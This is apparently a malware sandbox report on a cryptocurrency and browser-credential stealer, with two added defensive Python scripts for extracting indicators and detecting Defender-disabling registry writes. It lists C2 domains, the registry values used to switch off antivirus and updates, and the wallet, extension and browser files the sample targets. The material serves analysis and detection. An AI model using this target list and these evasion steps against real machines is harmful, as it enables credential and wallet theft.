Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00C8E142 rdtsc 10_2_00C8E142
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Code function: 10_2_00CA3D4C LdrInitializeThunk, 10_2_00CA3D4C
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: BGXAMSUR4L24WR8IH77.exe PID: 484, type: MEMORYSTR
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: s31ydU1MpQ.exe, 00000000.00000003.1255103620.0000000004D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: sweepyribs.lat
Source: BGXAMSUR4L24WR8IH77.exe, 0000000B.00000002.1682988540.0000000000A9D000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: Program Manager
Source: HXPC21YC8H3Q6AWWXLQHI1I.exe, 0000000A.00000002.1717486400.0000000000CD9000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: WProgram Manager
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGXAMSUR4L24WR8IH77.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
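The nine .lat domains above are the strings the report flags as candidate C2 hosts, and the "Stealing of Sensitive Information" section further down lists the wallet directories and the Chrome "Local Extension Settings" folders the sample opens. The Python below is an added example (not part of the Joe Sandbox report) that turns signature lines of those shapes into a hunt list: domains are taken from "String found in binary or memory" lines, %appdata%/%localappdata% wallet paths are expanded to a per-user glob, Chrome extension IDs (32 characters in the range a-p) are extracted from "File opened" lines, and browser credential/history files are collected. The sample lines are copied from this report with the memory-dump prefixes dropped; the category names, the file-extension skip list and the glob expansion are my assumptions.

```python
"""Turn Joe Sandbox signature lines into a hunt list.

Added example, not part of the report. Handles the two line shapes this page uses:
"String found in binary or memory: <domain | wallet path | other>" and
"File opened: <path> Jump to behavior".
"""
import re

TRAIL = r"(?:\s+Jump to behavior)?\s*$"
DOMAIN_RE = re.compile(r"String found in binary or memory: ([a-z0-9-]+(?:\.[a-z0-9-]+)+)" + TRAIL, re.I)
WALLET_RE = re.compile(r"String found in binary or memory: (%(?:appdata|localappdata)%\\\S+)", re.I)
EXT_RE = re.compile(r"File opened: .*\\Local Extension Settings\\([a-p]{32})(?![a-z])")
BROWSER_FILE_RE = re.compile(
    r"File opened: (.*\\(?:Login Data(?: For Account)?|History|Cookies|formhistory\.sqlite|prefs\.js))" + TRAIL)
# Strings shaped like a host name that are really file names (window-state.json above); heuristic.
FILE_EXTENSIONS = {"json", "exe", "dll", "sqlite", "js", "dat", "txt", "db"}
PLACEHOLDERS = {"%appdata%": r"C:\Users\*\AppData\Roaming", "%localappdata%": r"C:\Users\*\AppData\Local"}
USER_PROFILE_RE = re.compile(r"^([A-Za-z]:\\Users\\)[^\\]+\\")


def to_hunt_glob(path: str) -> str:
    """Expand %appdata%/%localappdata% and replace the user name with * for endpoint sweeps."""
    head, sep, rest = path.partition("\\")
    path = PLACEHOLDERS.get(head.lower(), head) + sep + rest
    return USER_PROFILE_RE.sub(r"\1*\\", path)


def parse_indicators(lines):
    """Group signature lines into domains, wallet paths, extension IDs and browser files."""
    out = {"domains": set(), "wallet_paths": set(), "extension_ids": set(), "browser_files": set()}
    for line in lines:
        if m := EXT_RE.search(line):
            out["extension_ids"].add(m.group(1))
        elif m := BROWSER_FILE_RE.search(line):
            out["browser_files"].add(to_hunt_glob(m.group(1)))
        elif m := WALLET_RE.search(line):
            out["wallet_paths"].add(to_hunt_glob(m.group(1)))
        elif (m := DOMAIN_RE.search(line)) and m.group(1).rsplit(".", 1)[-1].lower() not in FILE_EXTENSIONS:
            out["domains"].add(m.group(1).lower())
    return {k: sorted(v) for k, v in out.items()}


SRC = r"Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: "
CHROME = SRC + r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default" + "\\"
EDGE = SRC + r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default" + "\\"
FIREFOX = SRC + r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release" + "\\"
SAMPLE_LINES = [  # copied from this report's signature output, memory-dump prefixes dropped
    "Source: s31ydU1MpQ.exe String found in binary or memory: rapeflowwj.lat",
    "Source: s31ydU1MpQ.exe String found in binary or memory: crosshuaht.lat",
    "Source: s31ydU1MpQ.exe String found in binary or memory: sweepyribs.lat",
    "Source: s31ydU1MpQ.exe String found in binary or memory: window-state.json",
    "Source: s31ydU1MpQ.exe String found in binary or memory: keystore",
    r"Source: s31ydU1MpQ.exe String found in binary or memory: %appdata%\Electrum\wallets",
    r"Source: s31ydU1MpQ.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet",
    r"Source: s31ydU1MpQ.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets",
    CHROME + r"Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior",
    CHROME + r"Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior",
    CHROME + "Login Data For Account Jump to behavior",
    CHROME + "History Jump to behavior",
    EDGE + r"Network\Cookies Jump to behavior",
    FIREFOX + "formhistory.sqlite Jump to behavior",
    r"Source: C:\Users\user\Desktop\s31ydU1MpQ.exe Thread information set: HideFromDebugger Jump to behavior",
]

if __name__ == "__main__":
    for category, items in parse_indicators(SAMPLE_LINES).items():
        print(category)
        for item in items:
            print("   ", item)
```

The extension IDs are reported as-is: this page does not name the wallets behind them, so mapping an ID to a product is left to a Web Store lookup by the analyst. The domain regex deliberately skips names whose last label is a file extension, because the same "String found" line shape carries file names such as window-state.json.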

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Registry value created: TamperProtection 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
Source: s31ydU1MpQ.exe, 00000000.00000003.1437700853.0000000001317000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
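The registry writes above are the sample's defence-evasion step: real-time and IOAV protection and Defender's notifications are switched off through the Policies keys, TamperProtection is set to 0, three Windows Update policy values are changed, and the SecurityCenter2 AntiVirusProduct query enumerates whatever other AV is registered. The Python below is an added example (not from the report) of detection logic for exactly those writes, run over registry-set events. The event shape (image, target path, details, modelled on a Sysmon Event ID 13 record), the sample events, and the Defender Features key assumed for TamperProtection are my assumptions; the key paths and value names are the ones the report prints.

```python
"""Detection logic for the Defender / Windows Update policy writes in this report.

Added example, not part of the sandbox report. Events are constructed below in the
shape of a Sysmon Event ID 13 (RegistryEvent: value set) record; the key paths and
value names are the ones the report prints.
"""
import re

HKLM = "HKEY_LOCAL_MACHINE"
DEFENDER_RTP = HKLM + r"\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
DEFENDER_NOTIFY = HKLM + r"\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications"
DEFENDER_FEATURES = HKLM + r"\SOFTWARE\Microsoft\Windows Defender\Features"  # assumed: the report omits this key
WU_POLICY = HKLM + r"\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
WU_AU = WU_POLICY + r"\AU"

# (key, value name) -> (data that means tampering, or None for "any write"), finding label
WATCHED = {
    (DEFENDER_RTP, "DisableRealtimeMonitoring"): ("1", "defender_realtime_disabled"),
    (DEFENDER_RTP, "DisableIOAVProtection"): ("1", "defender_ioav_disabled"),
    (DEFENDER_NOTIFY, "DisableNotifications"): ("1", "defender_notifications_disabled"),
    (DEFENDER_FEATURES, "TamperProtection"): ("0", "defender_tamper_protection_off"),
    (WU_AU, "AUOptions"): (None, "windows_update_policy_changed"),
    (WU_AU, "AutoInstallMinorUpdates"): (None, "windows_update_policy_changed"),
    (WU_POLICY, "DoNotConnectToWindowsUpdateInternetLocations"): ("1", "windows_update_internet_blocked"),
}
_INDEX = {(k.lower(), v.lower()): spec for (k, v), spec in WATCHED.items()}

HIVE_ALIASES = {"HKLM": "HKEY_LOCAL_MACHINE", "HKCU": "HKEY_CURRENT_USER", "HKU": "HKEY_USERS"}
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")


def normalize_key(path: str) -> str:
    """Expand the short hive names Sysmon logs so paths compare with the report's form."""
    hive, sep, rest = path.partition("\\")
    return HIVE_ALIASES.get(hive.upper(), hive.upper()) + sep + rest


def normalize_data(details: str) -> str:
    """Turn Sysmon's 'DWORD (0x00000001)' into the decimal string the report shows."""
    m = DWORD_RE.fullmatch(details.strip())
    return str(int(m.group(1), 16)) if m else details.strip()


def find_tampering(events):
    """Return one finding per event whose key, value name and data match WATCHED.

    A write that restores a safe value (DisableRealtimeMonitoring = 0) is not reported;
    the Windows Update values match on any write because the report shows no data for them.
    """
    findings = []
    for ev in events:
        key, _, value_name = normalize_key(ev["target"]).rpartition("\\")
        spec = _INDEX.get((key.lower(), value_name.lower()))
        if spec is None:
            continue
        bad_data, label = spec
        data = normalize_data(ev["details"])
        if bad_data is not None and data != bad_data:
            continue
        findings.append({"image": ev["image"], "key": key, "value": value_name,
                         "data": data, "label": label})
    return findings


DROPPER = r"C:\Users\user\AppData\Local\Temp\HXPC21YC8H3Q6AWWXLQHI1I.exe"
POLICIES = r"HKLM\SOFTWARE\Policies\Microsoft"


def _event(target, details, image=DROPPER):
    return {"image": image, "target": target, "details": details}


SAMPLE_EVENTS = [  # constructed from the writes listed in the report, plus two benign ones
    _event(POLICIES + r"\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "DWORD (0x00000001)"),
    _event(POLICIES + r"\Windows Defender\Real-Time Protection\DisableIOAVProtection", "DWORD (0x00000001)"),
    _event(POLICIES + r"\Windows Defender Security Center\Notifications\DisableNotifications", "DWORD (0x00000001)"),
    _event(r"HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection", "DWORD (0x00000000)"),
    _event(POLICIES + r"\Windows\WindowsUpdate\AU\AUOptions", "DWORD (0x00000001)"),
    _event(POLICIES + r"\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations", "DWORD (0x00000001)"),
    # benign: an admin re-enabling real-time protection, and a WU value the report does not mention
    _event(POLICIES + r"\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring", "DWORD (0x00000000)",
           image=r"C:\Windows\regedit.exe"),
    _event(POLICIES + r"\Windows\WindowsUpdate\AU\NoAutoRebootWithLoggedOnUsers", "DWORD (0x00000001)"),
]

if __name__ == "__main__":
    for f in find_tampering(SAMPLE_EVENTS):
        print(f"{f['label']:34} {f['value']} = {f['data']}  by {f['image']}")
```

On a host where Tamper Protection is on, the Defender service ignores these policy writes, so a finding records an attempt, not a confirmed disable; the report itself only shows the writes, not their effect. Treat the image that performed the write as the pivot: here every flagged event comes from the dropped HXPC21YC8H3Q6AWWXLQHI1I.exe, which is what the report attributes the modifications to.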

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: s31ydU1MpQ.exe PID: 6440, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000000B.00000003.1623078762.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1683875991.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1681988687.0000000000681000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: BGXAMSUR4L24WR8IH77.exe PID: 484, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: s31ydU1MpQ.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: s31ydU1MpQ.exe String found in binary or memory: Wallets/Exodus
Source: s31ydU1MpQ.exe, 00000000.00000003.1367621560.00000000012D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: s31ydU1MpQ.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: s31ydU1MpQ.exe String found in binary or memory: keystore
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\s31ydU1MpQ.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
